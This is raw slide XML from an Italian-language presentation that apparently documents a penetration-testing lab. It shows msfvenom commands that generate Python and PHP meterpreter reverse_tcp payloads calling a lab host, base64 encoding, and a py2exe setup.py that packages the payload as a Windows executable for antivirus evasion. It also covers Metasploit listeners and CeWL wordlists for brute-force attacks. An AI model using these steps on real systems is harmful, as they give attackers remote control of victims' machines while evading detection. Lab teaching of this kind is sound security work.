          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rettangolo 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522412" y="1524000"/>
            <a:ext cx="7543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smtClean="0"/>
              <a:t>Scaricare una macchina Windows 10 ed installare  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> e py2exe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98612" y="533400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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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per AV/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Evasion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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MSFvenom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,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Attacco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6</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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760412" y="1814900"/>
            <a:ext cx="10210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err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -p python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> LHOST=10.0.2.13 LPORT=443 -f raw -o mrtp.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50177" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="989012" y="2819400"/>
            <a:ext cx="6553200" cy="3276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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from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distutils.core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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import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setup	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import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py2exe	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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setup(	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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“Meter”,	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>description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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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“Python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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-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based App”,	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>version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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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“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5CC5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.0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”,	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>console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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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[“mrtp.py”],	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>options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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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{“py2exe”: {“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bundle_files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”: 	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5CC5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1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,”packages”:”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ctypes”,”includes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”: 	“base64,sys,socket,struct,time,code,platform,getpass,shutil”,}},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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>zipfile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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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5CC5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>None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,	)	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7923212" y="2819400"/>
            <a:ext cx="37338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it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>È  necessario creare un file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>setup.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” per la creazione del file eseguibile.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7694612" y="4953000"/>
            <a:ext cx="37338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it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Per creare il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> malevolo: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>python.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> .\setup.py py2exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp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-1" y="457200"/>
            <a:ext cx="12188825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kumimoji="0" lang="it-I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Analisi </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Attacco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> 6)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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 14/07 ore 9.03 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Schermata del 2019-07-14 11-04-24.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="7279"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217612" y="1676400"/>
            <a:ext cx="9906000" cy="4953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674812" y="457200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it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Analisi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Attacco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> 6)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" smtClean="0"/>
              <a:t> – 19/07 ore 8.04 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Schermata del 2019-07-19 17-07-2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1012" y="1828800"/>
            <a:ext cx="9067800" cy="47421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674812" y="457200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MSFveno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m Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Attacco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 8</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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531812" y="2057400"/>
            <a:ext cx="839018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ja-JP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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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 -p </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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kumimoji="0" lang="en-US" altLang="ja-JP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lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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=10.0.2.13 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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lport</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP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=4444 -f raw</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ja-JP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Immagine 10" descr="4Attack.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="5848"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4570412" y="2895600"/>
            <a:ext cx="7389813" cy="2590800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455612" y="3505200"/>
            <a:ext cx="403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Copiare l’output prodotto in un file di testo e rimuovere il commento iniziale.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Salvare il file in formato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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685800"/>
            <a:ext cx="12188825" cy="7921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kumimoji="0" lang="it-I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Risultati </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Attacco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> 8)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3200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17/07 ore 20.00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Schermata del 2019-07-19 17-12-3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2412" y="1676400"/>
            <a:ext cx="9448800" cy="487998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98612" y="533400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MSFvenom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,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Attacco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6.1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="32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Aggiornato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 1/3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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684212" y="1828800"/>
            <a:ext cx="10210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err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -p python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> LHOST=10.0.2.13 LPORT=443 -f raw -o mrtp.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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2436812" y="2286000"/>
            <a:ext cx="601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it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>mrtp.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> | base64</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Immagine 13" descr="Schermata del 2019-07-22 16-46-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1812" y="3429000"/>
            <a:ext cx="6672512" cy="2514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98612" y="533400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MSFvenom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,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Attacco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6.1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="32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Aggiornato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 2/3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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436812" y="2133600"/>
            <a:ext cx="624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err="1" smtClean="0"/>
              <a:t>Copio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contenuto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>prodotto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>negli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> del file mrtp.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Schermata del 2019-07-22 22-02-0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7612" y="3581400"/>
            <a:ext cx="9829800" cy="9496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98612" y="533400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MSFvenom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,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Attacco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6.1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="32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Aggiornato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 2/2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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0177" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="989012" y="2819400"/>
            <a:ext cx="6553200" cy="3276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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from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distutils.core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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import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setup	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import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py2exe	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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setup(	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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“Meter”,	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>description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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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“Python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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-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based App”,	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>version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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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“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5CC5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.0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”,	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>console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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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[“mrtp.py”],	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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>options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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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{“py2exe”: {“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bundle_files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”: 	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5CC5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1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,”packages”:”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ctypes”,”includes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”: 	“base64,sys,socket,struct,time,code,platform,getpass,shutil”,}},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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	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E36209"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>zipfile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Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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5CC5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>None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itchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,	)	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7770812" y="3048000"/>
            <a:ext cx="37338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it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Per creare il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> malevolo: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>python.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t> .\setup.py py2exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp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98612" y="533400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Risultati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Payload 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,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Attacco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6.1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="32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Aggiornato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 – 21/07 ore 7.08</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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Immagine 10" descr="Schermata del 2019-07-21 09-10-21.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="9032" b="2857"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674812" y="1752600"/>
            <a:ext cx="8839200" cy="486767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Avviare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox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Segnaposto contenuto 5" descr="Schermata del 2019-07-07 10-02-4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19428" y="1905000"/>
            <a:ext cx="7828096" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns=""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0412" y="457200"/>
            <a:ext cx="1051560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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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per effettuare exploit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it-IT" sz="32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Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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5297" name="Rectangle 1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6322" name="Picture 2" descr="Risultati immagini per metasploi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7612" y="2514600"/>
            <a:ext cx="3352800" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5484812" y="3124200"/>
            <a:ext cx="533400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it-IT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Metasploit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è il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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utilizzato per effettuare la gran parte degli attacchi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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particolare exploit, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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listener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attesa della connessione con i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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payload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per exploit, per effettuare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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privilege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escalation e per attacchi di forza bruta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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74812" y="457200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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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per</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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Online Password Cracking - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT" sz="32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CeWL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-I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2225" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3275012" y="3276600"/>
            <a:ext cx="58692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ja-JP" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1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cewl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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</a:rPr>
              <a:t> -w list.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline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Calibri" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://10.0.2.15/bWAPP/phpinfo.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ja-JP" sz="32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531812" y="1981200"/>
            <a:ext cx="53340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Attraverso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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CeWL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posso creare dizionari online da pagine web da utilizzare per attacchi di forza bruta.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2227" name="Picture 3" descr="Risultati immagini per cewl"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="9388" t="57778" r="11237" b="5556"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3656012" y="4495800"/>
            <a:ext cx="4572000" cy="118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0412" y="457200"/>
            <a:ext cx="1051560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Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-I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per</a:t>
            </a:r>
            <a:r>
